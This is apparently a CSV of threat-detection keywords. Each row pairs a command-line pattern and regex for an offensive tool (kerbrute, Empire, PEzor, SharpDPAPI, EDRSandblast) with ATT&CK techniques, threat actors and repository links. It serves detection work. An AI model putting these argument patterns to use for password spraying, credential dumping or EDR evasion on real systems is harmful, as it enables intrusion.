"* -unhook -syscalls -obfuscate *",".{0,1000}\s\-unhook\s\-syscalls\s\-obfuscate\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","3617"
"* --unhook-method * --dont-unload-driver * --dump-output *",".{0,1000}\s\-\-unhook\-method\s.{0,1000}\s\-\-dont\-unload\-driver\s.{0,1000}\s\-\-dump\-output\s.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","3618"
"* UnhookNTDLL.ahk*",".{0,1000}\sUnhookNTDLL\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","3619"
"* unicorn.py*",".{0,1000}\sunicorn\.py.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","3620"
"* --union-char *GsFRts2*",".{0,1000}\s\-\-union\-char\s.{0,1000}GsFRts2.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3621"
"* unittest.nse*",".{0,1000}\sunittest\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3622"
"* --unregister Kali-Linux*",".{0,1000}\s\-\-unregister\sKali\-Linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","N/A","1","0","N/A","wsl.exe argument kali os","10","10","N/A","N/A","N/A","N/A","3623"
"* unusual-port.nse*",".{0,1000}\sunusual\-port\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3624"
"* UPDATE dbo.C2Agents*",".{0,1000}\sUPDATE\sdbo\.C2Agents.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","3625"
"* upload_c2profiles.py*",".{0,1000}\supload_c2profiles\.py.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","N/A","N/A","9","1","N/A","N/A","N/A","N/A","3627"
"* upnp-info.nse*",".{0,1000}\supnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3628"
"* uptime-agent-info.nse*",".{0,1000}\suptime\-agent\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3629"
"* -UrbanBishop -Command *",".{0,1000}\s\-UrbanBishop\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3630"
"* --url * --attacker *",".{0,1000}\s\-\-url\s.{0,1000}\s\-\-attacker\s.{0,1000}","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/sinsinology/CVE-2023-20887","1","0","N/A","N/A","N/A","3","232","43","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z","3631"
"* --url --password SIMPLEPASS*",".{0,1000}\s\-\-url\s\-\-password\sSIMPLEPASS.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","3632"
"* -urlcache */debase64/*",".{0,1000}\s\-urlcache\s.{0,1000}\/debase64\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","3633"
"* url-snarf.nse*",".{0,1000}\surl\-snarf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3634"
"* Use-DarkHotel*",".{0,1000}\sUse\-DarkHotel.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","3635"
"* -user * --passwordlist *",".{0,1000}\s\-user\s.{0,1000}\s\-\-passwordlist\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","3636"
"* --user 'nemesis:*",".{0,1000}\s\-\-user\s\'nemesis\:.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3637"
"* user pwnd Passw0rd123!*",".{0,1000}\suser\spwnd\sPassw0rd123!.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","#windows","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","3638"
"* -user userlist.txt -pass passwordlist.txt *",".{0,1000}\s\-user\suserlist\.txt\s\-pass\spasswordlist\.txt\s.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","0","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","3639"
"* user_persistence_run.c*",".{0,1000}\suser_persistence_run\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","3640"
"* --user-as-pass*",".{0,1000}\s\-\-user\-as\-pass.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","3641"
"* userenum * --dc *",".{0,1000}\suserenum\s.{0,1000}\s\-\-dc\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3642"
"* userenum -d * *.txt*",".{0,1000}\suserenum\s\-d\s.{0,1000}\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","3643"
"* --UserEnum --Host *",".{0,1000}\s\-\-UserEnum\s\-\-Host\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","3644"
"* -UserList * -Domain * -PasswordList * -OutFile *",".{0,1000}\s\-UserList\s.{0,1000}\s\-Domain\s.{0,1000}\s\-PasswordList\s.{0,1000}\s\-OutFile\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","3645"
"* -UserList * -Domain * -PasswordList * -OutFile *",".{0,1000}\s\-UserList\s.{0,1000}\s\-Domain\s.{0,1000}\s\-PasswordList\s.{0,1000}\s\-OutFile\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","3646"
"* -Username * -Hash * -Command *",".{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-SMBExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3647"
"* -Username * -Password * -Command * -LogonType *",".{0,1000}\s\-Username\s.{0,1000}\s\-Password\s.{0,1000}\s\-Command\s.{0,1000}\s\-LogonType\s.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","3648"
"* --UserName * --Password * --Payload *.exe*",".{0,1000}\s\-\-UserName\s.{0,1000}\s\-\-Password\s.{0,1000}\s\-\-Payload\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003  - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","3649"
"* -Username * -Password * -Recon -IncludeADFS*",".{0,1000}\s\-Username\s.{0,1000}\s\-Password\s.{0,1000}\s\-Recon\s\-IncludeADFS.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003 - T1621","TA0006 - TA0009","N/A","N/A","Exploitation tool","https://github.com/dafthack/MFASweep","1","0","N/A","N/A","9","10","1484","203","2025-03-04T20:36:41Z","2020-09-22T16:25:03Z","3650"
"* -userpassfile ./userpass_file.txt*",".{0,1000}\s\-userpassfile\s\.\/userpass_file\.txt.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","#linux","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","3651"
"* --userpassword_list *",".{0,1000}\s\-\-userpassword_list\s.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","0","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","3652"
"* -UserPersistenceOption *",".{0,1000}\s\-UserPersistenceOption\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3653"
"* --user-spns*",".{0,1000}\s\-\-user\-spns.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","0","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","3654"
"* Use-Waitfor.exe*",".{0,1000}\sUse\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","3655"
"* utils.ntlmdecode *",".{0,1000}\sutils\.ntlmdecode\s.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","3656"
"* UUID_bypass.py*",".{0,1000}\sUUID_bypass\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","3657"
"* vaporizer.py *",".{0,1000}\svaporizer\.py\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","3658"
"* --var-name=Smukx *",".{0,1000}\s\-\-var\-name\=Smukx\s.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","3659"
"* -VaultElementPtr *",".{0,1000}\s\-VaultElementPtr\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3660"
"* vaults /target:* /pvk:*",".{0,1000}\svaults\s\/target\:.{0,1000}\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","3661"
